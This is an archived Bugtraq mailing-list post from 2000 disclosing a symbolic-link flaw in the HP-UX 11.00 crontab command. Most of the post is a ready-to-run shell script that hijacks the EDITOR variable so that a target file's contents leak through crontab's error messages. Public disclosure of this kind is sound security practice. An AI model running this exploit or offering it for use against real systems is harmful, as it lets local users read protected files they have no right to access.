Bugtraq mailing list archives
HP-UX crontab exploit
From: Kyong-won Cho <dubhe () HACKERSLAB COM>
Date: Tue, 24 Oct 2000 10:03:04 +0900
[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability Attach ====================== crontab.sh ================================ #!/bin/sh # # HP-UX 11.00 crontab # # Kyong-won,Cho # # dubhe () hackerslab com # # Usage : ./crontab.sh <distfile> # # if [ -z "$1" ] then echo "Usage : $0 <distfile>" exit fi cat << _EOF_ > /tmp/crontab_exp #!/bin/sh ln -sf $1 \$1 _EOF_ chmod 755 /tmp/crontab_exp EDITOR=/tmp/crontab_exp export EDITOR crontab -e 2> /tmp/crontab$$ grep -v "error on previous line" /tmp/crontab$$ rm -f /tmp/crontab_exp /tmp/crontab$$ ==================================================end
Current thread:
- HP-UX crontab exploit Kyong-won Cho (Oct 24)